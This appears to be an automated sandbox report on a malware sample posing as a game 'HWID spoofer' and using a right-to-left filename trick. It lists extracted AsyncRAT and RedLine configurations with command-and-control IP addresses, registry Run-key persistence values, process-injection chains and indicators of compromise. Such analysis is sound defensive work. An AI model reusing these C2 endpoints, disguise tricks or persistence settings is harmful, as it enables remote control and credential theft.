asyncrat | d016fcbdb988d56df4c26d75a12e87a61010ed2366b52eefb8b409a1d8bcbaab

Resubmissions

08-04-2023 15:54

230408-tcfdvsdh99 7

28-01-2023 14:39

28-01-2023 12:12

28-01-2023 11:33

28-01-2023 11:17

Analysis

max time kernel
294s
max time network
301s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
28-01-2023 11:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hwid Spoofer Eac Rust Cleaner‮nls..scr
Size

658KB
MD5

556084cf64aec63e0babdf10a61afaa6
SHA1

b7fa21295db0657d1767c05bb440b218cecdf521
SHA256

d016fcbdb988d56df4c26d75a12e87a61010ed2366b52eefb8b409a1d8bcbaab
SHA512

6c896594ea47228f71f1dea7d9fd9f9842b5f178748a39c785ded34fb9dfd574c9bd781f1f65176e436453257078255803d729b79d823c01c6629fddfb3ce33e
SSDEEP

12288:LC/74rdbHgVBnqvFprkrUolVATWZXYm7ljg9hG80NEKXo1Y1UHC+O:LC/UGTWrkrUovUKfhkQNEwUnO

Score

10^/10

asyncrat redline ff securityhealthservice whostprojess discovery infostealer persistence rat spyware stealer upx

Malware Config

Extracted

Family

redline

Botnet

51.103.208.104:53200

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WHostProjess

95.70.151.185:8805

Mutex

WHostProjess

Attributes

delay
3
install
false
install_file
WHostProjess
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

SecurityHealthService

20.4.6.16:43521

Mutex

SecurityHealthService

Attributes

delay
3
install
false
install_file
SecurityHealthService
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1824-296-0x000000000041932E-mapping.dmp	family_redline
behavioral1/memory/1824-407-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Async RAT payload 7 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4864-846-0x000000000040D04E-mapping.dmp	asyncrat
behavioral1/memory/4864-954-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2268-1453-0x000000000040D0BE-mapping.dmp	asyncrat
behavioral1/memory/2268-1559-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/5036-1849-0x000000000040D0BE-mapping.dmp	asyncrat
behavioral1/memory/1652-1966-0x000000000040D04E-mapping.dmp	asyncrat
behavioral1/memory/5072-2225-0x000000000040D06E-mapping.dmp	asyncrat

Blocklisted process makes network request 9 IoCs

Processes:

rundll32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
63	1900	rundll32.exe
68	2200	powershell.exe
70	4812	powershell.exe
76	4276	powershell.exe
81	1888	powershell.exe
84	3796	powershell.exe
87	4692	powershell.exe
89	708	powershell.exe
93	4612	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 40 IoCs

Processes:

HJDS32.EXE0.exe3YxovXoRd8.exe3wPKIsr8zP.exerPEgNxF7Ko.exeKg1Z9jLcrT.exeeucbgdBgJM.exeConhost.exeT5PobisGaN.exeG6MrYvNp7T.exeyOjeI1UPbZ.exeEWMQ2uDJM9.exenvAJS98aQD.exebg3mx31Wve.exe0St4MK0NOU.exe2.exe3.exe4.exe5.exe5.exe6.exe7.exe8.exe9.exe10.exe11.exe12.exe3.exe13.exe6.exeEverything-1.4.1.1022.x64-Setup.exeEverything.exeEverything.exeEverything.exeEverything.exeEverything.exe11.exe12.exe3.exe6.exe

pid	process
4928	HJDS32.EXE
4300	0.exe
4272	3YxovXoRd8.exe
4892	3wPKIsr8zP.exe
4604	rPEgNxF7Ko.exe
376	Kg1Z9jLcrT.exe
2880	eucbgdBgJM.exe
4916	Conhost.exe
2964	T5PobisGaN.exe
3376	G6MrYvNp7T.exe
3692	yOjeI1UPbZ.exe
1496	EWMQ2uDJM9.exe
4480	nvAJS98aQD.exe
4980	bg3mx31Wve.exe
1520	0St4MK0NOU.exe
3984	2.exe
4460	3.exe
4280	4.exe
4296	5.exe
5036	5.exe
4384	6.exe
532	7.exe
2112	8.exe
4476	9.exe
4420	10.exe
1440	11.exe
2452	12.exe
2864	3.exe
3468	13.exe
4548	6.exe
2200	Everything-1.4.1.1022.x64-Setup.exe
1496	Everything.exe
328	Everything.exe
3036	Everything.exe
4332	Everything.exe
1416	Everything.exe
2684	11.exe
4412	12.exe
5016	3.exe
2700	6.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\HJDS32.EXE	upx
C:\Users\Admin\AppData\Roaming\HJDS32.EXE	upx
behavioral1/memory/4928-228-0x00007FF604590000-0x00007FF6046EF000-memory.dmp	upx
behavioral1/memory/4928-231-0x00007FF604590000-0x00007FF6046EF000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\0.exe	upx
C:\Users\Admin\AppData\Local\Temp\0.exe	upx
behavioral1/memory/4300-235-0x00007FF7451C0000-0x00007FF745321000-memory.dmp	upx
behavioral1/memory/4300-450-0x00007FF7451C0000-0x00007FF745321000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Everything.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Control Panel\International\Geo\Nation	Everything.exe

Loads dropped DLL 6 IoCs

Processes:

Everything-1.4.1.1022.x64-Setup.exe

pid	process
2200	Everything-1.4.1.1022.x64-Setup.exe
2200	Everything-1.4.1.1022.x64-Setup.exe
2200	Everything-1.4.1.1022.x64-Setup.exe
2200	Everything-1.4.1.1022.x64-Setup.exe
2200	Everything-1.4.1.1022.x64-Setup.exe
2200	Everything-1.4.1.1022.x64-Setup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

7.exepowershell.exepowershell.exeEverything.exepowershell.exe5.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Everything.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Everything = "\"C:\\Program Files\\Everything\\Everything.exe\" -startup"	Everything.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\WHost = "C:\\Users\\Admin\\AppData\\Roaming\\WHost\\WHost.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\zXQYDaStND = "C:\\Users\\Admin\\AppData\\Roaming\\yQKALotXEZ\\wXDStJGKiy.exe"	5.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Everything.exe

description	ioc	process
File opened (read-only)	\??\Y:	Everything.exe
File opened (read-only)	\??\Z:	Everything.exe
File opened (read-only)	\??\A:	Everything.exe
File opened (read-only)	\??\N:	Everything.exe
File opened (read-only)	\??\O:	Everything.exe
File opened (read-only)	\??\Q:	Everything.exe
File opened (read-only)	\??\T:	Everything.exe
File opened (read-only)	\??\X:	Everything.exe
File opened (read-only)	\??\B:	Everything.exe
File opened (read-only)	\??\H:	Everything.exe
File opened (read-only)	\??\K:	Everything.exe
File opened (read-only)	\??\W:	Everything.exe
File opened (read-only)	\??\F:	Everything.exe
File opened (read-only)	\??\J:	Everything.exe
File opened (read-only)	\??\M:	Everything.exe
File opened (read-only)	\??\S:	Everything.exe
File opened (read-only)	\??\U:	Everything.exe
File opened (read-only)	\??\V:	Everything.exe
File opened (read-only)	\??\E:	Everything.exe
File opened (read-only)	\??\G:	Everything.exe
File opened (read-only)	\??\I:	Everything.exe
File opened (read-only)	\??\L:	Everything.exe
File opened (read-only)	\??\P:	Everything.exe
File opened (read-only)	\??\R:	Everything.exe

Suspicious use of SetThreadContext 16 IoCs

Processes:

Hwid Spoofer Eac Rust Cleaner‮nls..scr3YxovXoRd8.exe2.exe4.exe5.exe3.exe6.exe10.exe13.exe11.exe12.exe3.exe6.exe11.exe12.exe3.exe

description	pid	process	target process
PID 1888 set thread context of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 4272 set thread context of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 3984 set thread context of 4864	3984	2.exe	RegAsm.exe
PID 4280 set thread context of 2268	4280	4.exe	RegAsm.exe
PID 4296 set thread context of 5036	4296	5.exe	5.exe
PID 4460 set thread context of 1652	4460	3.exe	RegAsm.exe
PID 4384 set thread context of 5072	4384	6.exe	RegAsm.exe
PID 4420 set thread context of 1860	4420	10.exe	RegAsm.exe
PID 3468 set thread context of 1884	3468	13.exe	RegAsm.exe
PID 1440 set thread context of 3844	1440	11.exe	RegAsm.exe
PID 2452 set thread context of 3344	2452	12.exe	RegAsm.exe
PID 2864 set thread context of 1784	2864	3.exe	RegAsm.exe
PID 4548 set thread context of 728	4548	6.exe	RegAsm.exe
PID 2684 set thread context of 2400	2684	11.exe	RegAsm.exe
PID 4412 set thread context of 1504	4412	12.exe	RegAsm.exe
PID 5016 set thread context of 3788	5016	3.exe	RegAsm.exe

Drops file in Program Files directory 7 IoCs

Processes:

Everything.exeEverything.exe

description	ioc	process
File created	C:\Program Files\Everything\License.txt	Everything.exe
File created	C:\Program Files\Everything\Everything.lng	Everything.exe
File created	C:\Program Files\Everything\Uninstall.exe	Everything.exe
File created	C:\Program Files\Everything\Everything.ini.tmp	Everything.exe
File created	C:\Program Files\Everything\Everything.exe	Everything.exe
File opened for modification	C:\Program Files\Everything\Everything.exe	Everything.exe
File created	C:\Program Files\Everything\Changes.txt	Everything.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4264 2112 WerFault.exe 8.exe

pid	pid_target	process	target process
4264	2112	WerFault.exe	8.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Winword.exefirefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3264 schtasks.exe
4432 schtasks.exe
4968 schtasks.exe
3940 schtasks.exe

pid	process
3264	schtasks.exe
4432	schtasks.exe
4968	schtasks.exe
3940	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Winword.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe

Modifies registry class 28 IoCs

Processes:

OpenWith.exeEverything.exeRegAsm.exefirefox.exeEverything.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\SLN_auto_file\shell\edit\command\ = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\Winword.exe\" /n \"%1\""	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell	Everything.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell\open\command\ = "\"C:\\Program Files\\Everything\\Everything.exe\" \"%1\""	Everything.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell\open\command	Everything.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\DefaultIcon\ = "C:\\Program Files\\Everything\\Everything.exe, 1"	Everything.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\SLN_auto_file	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.efu	Everything.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.efu\Content Type = "text/plain"	Everything.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\.SLN\ = "SLN_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\SLN_auto_file\shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\SLN_auto_file\shell\edit\ = "@C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\oregres.dll,-1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\.SLN	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.efu\ = "Everything.FileList"	Everything.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	Everything.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList	Everything.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell\open	Everything.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell\edit	Everything.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell\edit\command\ = "\"C:\\Program Files\\Everything\\Everything.exe\" -edit \"%1\""	Everything.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\shell\edit\command	Everything.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Everything.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\SLN_auto_file\shell\edit\command	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.efu\PerceivedType = "text"	Everything.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\ = "Everything File List"	Everything.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Everything.FileList\DefaultIcon	Everything.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\SLN_auto_file\shell\edit	OpenWith.exe

NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64-Setup.exe:Zone.Identifier firefox.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

Winword.exe

pid process

3040 Winword.exe
3040 Winword.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64-Setup.exe:Zone.Identifier	firefox.exe

pid	process
3040	Winword.exe
3040	Winword.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exe2.exepowershell.exepowershell.exepowershell.exe

pid	process
4544	powershell.exe
192	powershell.exe
4544	powershell.exe
1652	powershell.exe
1900	powershell.exe
4544	RegAsm.exe
192	powershell.exe
2200	powershell.exe
2200	powershell.exe
1652	powershell.exe
1652	powershell.exe
192	powershell.exe
192	powershell.exe
1900	powershell.exe
1900	powershell.exe
1652	powershell.exe
4812	powershell.exe
4812	powershell.exe
4276	powershell.exe
4276	powershell.exe
1900	powershell.exe
2200	powershell.exe
1888	powershell.exe
1888	powershell.exe
4812	powershell.exe
2200	powershell.exe
4276	powershell.exe
4812	powershell.exe
1888	powershell.exe
4276	powershell.exe
4692	powershell.exe
1888	powershell.exe
4692	powershell.exe
3796	powershell.exe
3796	powershell.exe
708	powershell.exe
708	powershell.exe
4692	powershell.exe
4612	powershell.exe
4612	powershell.exe
3796	powershell.exe
708	powershell.exe
4612	powershell.exe
4692	powershell.exe
3796	powershell.exe
708	powershell.exe
4612	powershell.exe
1824	RegAsm.exe
1824	RegAsm.exe
3984	2.exe
3984	2.exe
3984	2.exe
3984	2.exe
1824	RegAsm.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
2284	powershell.exe
2284	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

5116 OpenWith.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exe2.exepowershell.exepowershell.exe5.exe3.exe6.exepowershell.exe13.exepowershell.exe11.exe12.exe3.exefirefox.exe6.exe11.exe12.exe3.exe

description	pid	process
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	192	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	1824	RegAsm.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	3984	2.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	4296	5.exe
Token: SeDebugPrivilege	4460	3.exe
Token: SeDebugPrivilege	4384	6.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	3468	13.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	1440	11.exe
Token: SeDebugPrivilege	2452	12.exe
Token: SeDebugPrivilege	2864	3.exe
Token: SeDebugPrivilege	4748	firefox.exe
Token: SeDebugPrivilege	4748	firefox.exe
Token: SeDebugPrivilege	4548	6.exe
Token: SeDebugPrivilege	2684	11.exe
Token: SeDebugPrivilege	4412	12.exe
Token: SeDebugPrivilege	5016	3.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

firefox.exeEverything.exe

pid process

4748 firefox.exe
4748 firefox.exe
4748 firefox.exe
4748 firefox.exe
1416 Everything.exe
1416 Everything.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

firefox.exeEverything.exe

pid process

4748 firefox.exe
4748 firefox.exe
4748 firefox.exe
1416 Everything.exe

pid	process
4748	firefox.exe
4748	firefox.exe
4748	firefox.exe
4748	firefox.exe
1416	Everything.exe
1416	Everything.exe

pid	process
4748	firefox.exe
4748	firefox.exe
4748	firefox.exe
1416	Everything.exe

Suspicious use of SetWindowsHookEx 58 IoCs

Processes:

OpenWith.exeWinword.exefirefox.exeEverything.exe

pid	process
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
5116	OpenWith.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
3040	Winword.exe
4748	firefox.exe
4748	firefox.exe
4748	firefox.exe
4748	firefox.exe
1416	Everything.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Hwid Spoofer Eac Rust Cleaner‮nls..scrRegAsm.exeHJDS32.EXEcmd.exe0.execmd.exeConhost.exe3wPKIsr8zP.exe3YxovXoRd8.execmd.exenvAJS98aQD.exerPEgNxF7Ko.execmd.exeKg1Z9jLcrT.exeeucbgdBgJM.execmd.exeConhost.exeWinword.exe

description	pid	process	target process
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1888 wrote to memory of 3788	1888	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 3788 wrote to memory of 4928	3788	RegAsm.exe	HJDS32.EXE
PID 3788 wrote to memory of 4928	3788	RegAsm.exe	HJDS32.EXE
PID 4928 wrote to memory of 3564	4928	HJDS32.EXE	cmd.exe
PID 4928 wrote to memory of 3564	4928	HJDS32.EXE	cmd.exe
PID 3564 wrote to memory of 4300	3564	cmd.exe	0.exe
PID 3564 wrote to memory of 4300	3564	cmd.exe	0.exe
PID 4300 wrote to memory of 4996	4300	0.exe	cmd.exe
PID 4300 wrote to memory of 4996	4300	0.exe	cmd.exe
PID 4996 wrote to memory of 4272	4996	cmd.exe	3YxovXoRd8.exe
PID 4996 wrote to memory of 4272	4996	cmd.exe	3YxovXoRd8.exe
PID 4996 wrote to memory of 4272	4996	cmd.exe	3YxovXoRd8.exe
PID 4300 wrote to memory of 4988	4300	0.exe	Conhost.exe
PID 4300 wrote to memory of 4988	4300	0.exe	Conhost.exe
PID 4988 wrote to memory of 4892	4988	Conhost.exe	3wPKIsr8zP.exe
PID 4988 wrote to memory of 4892	4988	Conhost.exe	3wPKIsr8zP.exe
PID 4300 wrote to memory of 3924	4300	0.exe	cmd.exe
PID 4300 wrote to memory of 3924	4300	0.exe	cmd.exe
PID 4892 wrote to memory of 4544	4892	3wPKIsr8zP.exe	powershell.exe
PID 4892 wrote to memory of 4544	4892	3wPKIsr8zP.exe	powershell.exe
PID 4300 wrote to memory of 4480	4300	0.exe	nvAJS98aQD.exe
PID 4300 wrote to memory of 4480	4300	0.exe	nvAJS98aQD.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 4272 wrote to memory of 1824	4272	3YxovXoRd8.exe	RegAsm.exe
PID 3924 wrote to memory of 4604	3924	cmd.exe	rPEgNxF7Ko.exe
PID 3924 wrote to memory of 4604	3924	cmd.exe	rPEgNxF7Ko.exe
PID 4300 wrote to memory of 1660	4300	0.exe	cmd.exe
PID 4300 wrote to memory of 1660	4300	0.exe	cmd.exe
PID 4480 wrote to memory of 376	4480	nvAJS98aQD.exe	Kg1Z9jLcrT.exe
PID 4480 wrote to memory of 376	4480	nvAJS98aQD.exe	Kg1Z9jLcrT.exe
PID 4604 wrote to memory of 192	4604	rPEgNxF7Ko.exe	powershell.exe
PID 4604 wrote to memory of 192	4604	rPEgNxF7Ko.exe	powershell.exe
PID 1660 wrote to memory of 2880	1660	cmd.exe	eucbgdBgJM.exe
PID 1660 wrote to memory of 2880	1660	cmd.exe	eucbgdBgJM.exe
PID 4300 wrote to memory of 1488	4300	0.exe	cmd.exe
PID 4300 wrote to memory of 1488	4300	0.exe	cmd.exe
PID 376 wrote to memory of 1652	376	Kg1Z9jLcrT.exe	powershell.exe
PID 376 wrote to memory of 1652	376	Kg1Z9jLcrT.exe	powershell.exe
PID 2880 wrote to memory of 1900	2880	eucbgdBgJM.exe	powershell.exe
PID 2880 wrote to memory of 1900	2880	eucbgdBgJM.exe	powershell.exe
PID 4300 wrote to memory of 3040	4300	0.exe	Winword.exe
PID 4300 wrote to memory of 3040	4300	0.exe	Winword.exe
PID 1488 wrote to memory of 4916	1488	cmd.exe	Conhost.exe
PID 1488 wrote to memory of 4916	1488	cmd.exe	Conhost.exe
PID 4300 wrote to memory of 4552	4300	0.exe	cmd.exe
PID 4300 wrote to memory of 4552	4300	0.exe	cmd.exe
PID 4916 wrote to memory of 2200	4916	Conhost.exe	powershell.exe
PID 4916 wrote to memory of 2200	4916	Conhost.exe	powershell.exe
PID 3040 wrote to memory of 2964	3040	Winword.exe	T5PobisGaN.exe

C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner‮nls..scr
"C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner‮nls..scr" /S
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Roaming\HJDS32.EXE
